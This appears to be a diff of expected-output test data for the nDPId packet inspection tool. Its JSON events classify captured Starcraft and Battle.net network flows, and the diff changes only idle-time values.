+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1437389985898,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985898,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOFAAIAG2oLAqAFkAuQucA3KAFB0cH\/ZAAAAAIACIABZTAAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985923,"flow_last_seen":1437389985923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985923,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1437389985923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOJAAIAG2oHAqAFkAuQucA3LAFDKy4tMAAAAAIACIAD3fAAAAgQFtAEDAwgBAQQC"} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1437389985923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDccmQrPVioc3eYASOQiYawAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1437389985923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLONAAIAG2ozAqAFkAuQucA3HAFCKhzd5JkKz1lAQAQARRAAA"} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOVAAIAG2n7AqAFkAuQucA3MAFCmW5TdAAAAAIACIAASWwAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOZAAIAG2n3AqAFkAuQucA3NAFAjKxvdAAAAAIACIAAOiwAAAgQFtAEDAwgBAQQC"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1437389985927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985927,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDci+ghTYcwdU7IASOQiZNAAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1437389985927,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985927,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOdAAIAG2ojAqAFkAuQucA3IAFBzB1TsvoIU2VAQAQASDQAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1437389985929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985929,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcngMONLcUlhXYASOQieXgAAAgQFtAEBBAIBAwMF"} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1437389985929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985929,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOhAAIAG2ofAqAFkAuQucA3JAFBxSWFd4DDjTFAQAQAXNwAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1437389985930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985930,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcrPCIDOdHB\/2oASOQjwXgAAAgQFtAEBBAIBAwMF"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1437389985930,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985930,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOlAAIAG2obAqAFkAuQucA3KAFB0cH\/azwiAz1AQAQBpNwAA"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1437389985955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985955,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcsAWb5HysuLTYASOQgfxgAAAgQFtAEBBAIBAwMF"} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1437389985955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985955,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOxAAIAG2oPAqAFkAuQucA3LAFDKy4tNAFm+SFAQAQCYngAA"} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1437389985957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985957,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcy5z5mcpluU3oASOQil2AAAAgQFtAEBBAIBAwMF"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1437389985957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985957,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLO9AAIAG2oDAqAFkAuQucA3MAFCmW5Teuc+ZnVAQAQAesQAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985960,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1437389985960,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985960,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LPVAAIAG2m7AqAFkAuQucA3OAFAbejKQAAAAAIACIAD\/hwAAAgQFtAEDAwgBAQQC"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1437389985962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985962,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDc1+R6dFIysb3oASOQjP5wAAAgQFtAEBBAIBAwMF"} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1437389985962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985962,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLPpAAIAG2nXAqAFkAuQucA3NAFAjKxvefkenRlAQAQBIwAAA"} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982825,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 
+00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389961548,"flow_last_seen":1437389961598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"64.233.184.188","src_port":2759,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389955932,"flow_last_seen":1437389955967,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"216.58.212.110","src_port":3052,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389981134,"flow_last_seen":1437389981218,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":53145,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} 
+00703{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389964518,"flow_last_seen":1437389964635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":777,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"173.194.113.224","src_port":3506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} 00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389976946,"flow_last_seen":1437389980126,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.107","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 